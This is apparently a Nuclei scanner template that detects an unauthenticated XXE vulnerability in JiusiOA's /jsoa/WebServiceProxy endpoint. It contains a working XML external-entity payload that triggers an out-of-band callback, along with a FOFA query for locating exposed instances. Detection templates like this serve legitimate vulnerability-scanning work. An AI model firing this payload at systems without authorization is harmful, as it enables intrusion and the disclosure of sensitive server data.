http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - |
          POST /jsoa/WebServiceProxy HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>
id: jiusiOA-WebServiceProxy-XXE
info:
    author: Superhero
    description: |-
        fofa：body="/jsoa/login.jsp"
        九思OA /jsoa/WebServiceProxy 接口处存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据，使系统处于极不安全状态。
    name: 九思OA /jsoa/WebServiceProxy XXE漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486486&idx=1&sn=f760741dbe7dbe41fcc8c5df70c75c02&chksm=c267b925f5103033d97a82f7593c17340a651040e7b0928ac8355ecc813ed2903ba02eb2b0b2&token=1628549949&lang=zh_CN#rd
    severity: high
    tags:
        - XXE
        - Ioa
        - 九思OA
